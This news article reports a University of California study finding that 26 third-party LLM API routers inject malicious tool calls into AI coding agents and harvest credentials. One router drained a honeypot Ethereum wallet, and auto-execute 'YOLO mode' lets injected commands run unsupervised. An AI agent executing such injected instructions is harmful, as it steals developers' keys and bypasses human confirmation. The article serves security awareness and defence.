Key Takeaways
- University of California study identified 26 compromised third-party LLM routing services targeting crypto developers
- Researchers witnessed one routing service drain Ethereum from a test wallet setup
- These routing services can read all transmitted data in plain text, exposing sensitive information like wallet keys
- Automatic execution features like “YOLO mode” enable AI systems to run injected malicious instructions without human oversight
- Security experts urge developers to keep cryptocurrency credentials completely separate from AI-assisted coding sessions
A team from the University of California has uncovered a troubling vulnerability in the artificial intelligence development ecosystem: compromised routing services capable of siphoning cryptocurrency credentials and embedding harmful code into software projects.
26 LLM routers are secretly injecting malicious tool calls and stealing creds. One drained our client $500k wallet.
We also managed to poison routers to forward traffic to us. Within several hours, we can directly take over ~400 hosts.
Check our paper: https://t.co/zyWz25CDpl pic.twitter.com/PlhmOYz2ec
— Chaofan Shou (@Fried_rice) April 10, 2026
The research team published their discoveries this week in a comprehensive study examining what they termed “adversarial intermediary threats” targeting the large language model infrastructure chain.
These LLM routing platforms function as intermediary services positioned between software developers and major AI providers such as OpenAI, Anthropic, and Google. Their purpose is to orchestrate and distribute API traffic across various AI service providers.
The security weakness stems from how these platforms handle encrypted communications. They must decrypt traffic to function, which grants them unrestricted access to view all information flowing through their systems.
Developers leveraging AI-powered development tools like Claude Code for building blockchain applications or cryptocurrency storage solutions may unknowingly transmit sensitive wallet keys and recovery phrases through these compromised intermediaries.
The research team evaluated 28 commercial routing platforms alongside 400 free-tier services collected from developer communities.
Their investigation revealed nine platforms actively embedding malicious instructions, two employing sophisticated detection-avoidance techniques, and 17 harvesting researcher-controlled Amazon Web Services authentication tokens.
One particular routing service successfully withdrew Ethereum from a deliberately created honeypot wallet. The researchers documented losses totaling less than $50.
According to the study, distinguishing between legitimate credential processing and outright theft presents an essentially insurmountable challenge for end users, given that routing platforms inherently process sensitive information in unencrypted form during normal operations.
The Dangers of Automatic Execution
The study highlighted an especially concerning feature present in numerous AI automation frameworks known as “YOLO mode.” When activated, this configuration allows AI systems to perform operations immediately without requesting user confirmation.
This capability amplifies the security threat significantly. When a routing platform injects harmful commands, YOLO mode enables those commands to execute completely unsupervised.
The research team also discovered that previously trustworthy routing services can become compromised covertly without operators being aware. Free-tier platforms especially may advertise discounted API connectivity as bait while secretly harvesting authentication credentials.
Security Recommendations for Developers
The researchers urged software developers to implement stronger client-side security measures and categorically prohibit cryptocurrency keys or recovery phrases from being transmitted through AI-assisted development environments.
For a sustainable solution, the research team suggested that AI service providers should implement cryptographic signature verification for their outputs. This would enable developers to authenticate that instructions received by AI agents genuinely originated from the intended model provider.
Co-author Chaofan Shou shared on X that “26 LLM routers are secretly injecting malicious tool calls and stealing creds.”
The researchers emphasized that LLM API routing platforms occupy a critical security perimeter that the wider artificial intelligence industry currently assumes to be inherently trustworthy.
The published study did not include specific details such as blockchain transaction identifiers for the compromised wallet incident.
